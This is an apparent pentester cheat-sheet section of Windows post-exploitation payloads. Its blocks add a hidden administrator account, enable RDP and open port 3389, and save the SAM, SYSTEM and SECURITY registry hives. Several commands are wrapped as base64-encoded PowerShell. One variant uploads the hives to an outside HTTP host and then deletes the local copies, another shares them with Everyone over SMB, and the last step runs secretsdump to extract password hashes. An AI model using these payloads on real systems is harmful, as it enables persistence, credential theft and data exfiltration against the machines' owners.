############ Payload/Loot ############ | New admin hackerbeepboop Blabliblou_1 .. code-block:: bash cat << 'EOF' | iconv -f UTF8 -t UTF16LE | base64 -w 0 | tee /tmp/payload.ps1 net user hackerbeepboop Blabliblou_1 /ADD net localgroup Administrators hackerbeepboop /ADD net localgroup "Remote Desktop Users" hackerbeepboop /ADD reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f netsh firewall add portopening TCP 3389 "Remote Desktop" EOF # bgBlAHQAIAB1AHMAZQByACAAaABhAGMAawBlAHIAYgBlAGUAcABiAG8AbwBwACAAQgBsAGEAYgBsAGkAYgBsAG8AdQBfADEAIAAvAEEARABEAAoAbgBlAHQAIABsAG8AYwBhAGwAZwByAG8AdQBwACAAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBzACAAaABhAGMAawBlAHIAYgBlAGUAcABiAG8AbwBwACAALwBBAEQARAAKAG4AZQB0ACAAbABvAGMAYQBsAGcAcgBvAHUAcAAgACIAUgBlAG0AbwB0AGUAIABEAGUAcwBrAHQAbwBwACAAVQBzAGUAcgBzACIAIABoAGEAYwBrAGUAcgBiAGUAZQBwAGIAbwBvAHAAIAAvAEEARABEAAoAcgBlAGcAIABhAGQAZAAgACIASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABUAGUAcgBtAGkAbgBhAGwAIABTAGUAcgB2AGUAcgAiACAALwB2ACAAZgBEAGUAbgB5AFQAUwBDAG8AbgBuAGUAYwB0AGkAbwBuAHMAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADAAIAAvAGYAIAAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwAVABlAHIAbQBpAG4AYQBsACAAUwBlAHIAdgBlAHIAIgAgAC8AdgAgAGYAQQBsAGwAbwB3AFQAbwBHAGUAdABIAGUAbABwACAALwB0ACAAUgBFAEcAXwBEAFcATwBSAEQAIAAvAGQAIAAxACAALwBmACAACgBuAGUAdABzAGgAIABmAGkAcgBlAHcAYQBsAGwAIABhAGQAZAAgAHAAbwByAHQAbwBwAGUAbgBpAG4AZwAgAFQAQwBQACAAMwAzADgAOQAgACIAUgBlAG0AbwB0AGUAIABEAGUAcwBrAHQAbwBwACIACgA= Start-Process -NoNewWindow -FilePath "powershell.exe" -ArgumentList "-E", "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" | | dump SAM SYSTEM SECURITY .. 
code-block:: powershell cat << 'EOF' | iconv -f UTF8 -t UTF16LE | base64 -w 0 | tee /tmp/payload.ps1 $d="$env:TEMP\";%{"sam";"system";"security"}|%{reg save hklm\$_ $d$_} EOF # JABkAGkAcgA9ACIAJABlAG4AdgA6AFQARQBNAFAAXAAiADsAJQB7ACIAcwBhAG0AIgA7ACIAcwB5AHMAdABlAG0AIgA7ACIAcwBlAGMAdQByAGkAdAB5ACIAfQB8ACUAewByAGUAZwAgAHMAYQB2AGUAIABoAGsAbABtAFwAJABfACAAJABkAGkAcgAkAF8AfQAKAA== | | dump SAM SYSTEM SECURITY, upload, delete .. code-block:: powershell cat << 'EOF' | iconv -f UTF8 -t UTF16LE | base64 -w 0 | tee /tmp/payload.ps1 $u="http://192.168.1.163:8080";$d="$env:TEMP\";%{"sam";"system";"security"}|%{reg save hklm\$_ $d$_;(New-Object System.Net.WebClient).UploadFile("$u","$d$_");clc "$d$_";rm "$d$_"} EOF # JAB1AD0AIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQA2ADMAOgA4ADAAOAAwACIAOwAkAGQAPQAiACQAZQBuAHYAOgBUAEUATQBQAFwAIgA7ACUAewAiAHMAYQBtACIAOwAiAHMAeQBzAHQAZQBtACIAOwAiAHMAZQBjAHUAcgBpAHQAeQAiAH0AfAAlAHsAcgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcACQAXwAgACQAZAAkAF8AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAiACQAdQAiACwAIgAkAGQAJABfACIAKQA7AGMAbABjACAAIgAkAGQAJABfACIAOwByAG0AIAAiACQAZAAkAF8AIgB9AAoA # cd $(mktemp -d) && git clone https://gitlab.com/charles.gargasson/PostDL . && sudo python3 postdl.py --ip 0.0.0.0 -p 8080 & Start-Process -NoNewWindow -FilePath "powershell.exe" -ArgumentList "-E", "JAB1AD0AIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQA2ADMAOgA4ADAAOAAwACIAOwAkAGQAPQAiACQAZQBuAHYAOgBUAEUATQBQAFwAIgA7ACUAewAiAHMAYQBtACIAOwAiAHMAeQBzAHQAZQBtACIAOwAiAHMAZQBjAHUAcgBpAHQAeQAiAH0AfAAlAHsAcgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcACQAXwAgACQAZAAkAF8AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAiACQAdQAiACwAIgAkAGQAJABfACIAKQA7AGMAbABjACAAIgAkAGQAJABfACIAOwByAG0AIAAiACQAZAAkAF8AIgB9AAoA" | | dump SAM SYSTEM SECURITY, share them with a temporary SMB share (.. 
you need a user if passwordless access is disabled, but you can change this setting) .. code-block:: powershell mkdir "$env:TEMP\S";New-SmbShare -Name S -Path "$env:TEMP\S" -Temporary -FullAccess ([System.Security.Principal.SecurityIdentifier]::new('S-1-1-0')).Translate([System.Security.Principal.NTAccount]).Value $d="$env:TEMP\S\";%{"sam";"system";"security"}|%{reg save hklm\$_ $d$_} # Get-SmbShare # Remove-SmbShare -Name S -Force | | Read sam system security .. code-block:: bash secretsdump.py -sam /tmp/share/sam -system /tmp/share/system -security /tmp/share/security local -history